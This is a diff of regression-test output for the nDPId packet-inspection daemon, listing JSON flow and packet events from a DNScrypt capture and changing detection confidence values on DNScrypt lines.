00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":946739305328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305328,"pkt":"REREREREZmZmZmZmCABFAAIcwJJAAL0RNQcKAAABlXBwCti6IPsCCMhQa\/wBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":946739305329,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305329,"pkt":"ZmZmZmZmRERERERECABFAADWg1EAADQR55WOBMxvCgAAAQG7qfEAwi9XAg+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":946739305330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305330,"pkt":"ZmZmZmZmRERERERECABFAADWg08AADQR55eOBMxvCgAAAQG77iIAwusoAgyBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":946739305331,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305331,"pkt":"ZmZmZmZmRERERERECABFAADWg1IAADQR55SOBMxvCgAAAQG7twgAwiI\/AhCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} @@ -341,26 +341,26 @@ 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":946739305384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":946739305384,"pkt":"ZmZmZmZmRERERERECABFAABH12NAADsRoguVcHAKCgAAASD74HkAM076a\/6AAAABAAAAAAAAATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQ=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAIc+l9AAL0R9vsKAAABrGhdUMFoBaMCCMyOtDkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mAgAL0REzsKAAABrGhdUMbhBaMGBCsUtDYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":179,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739306241} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":179,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mAAub0ROA4KAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mEgAL0REzoKAAABrGhdUKNIBaMGBE6vtDQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":181,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739306241} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":181,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mEAub0ROA0KAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAIc+mJAAL0R9vgKAAABrGhdUJWLBaMCCMyOtDUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 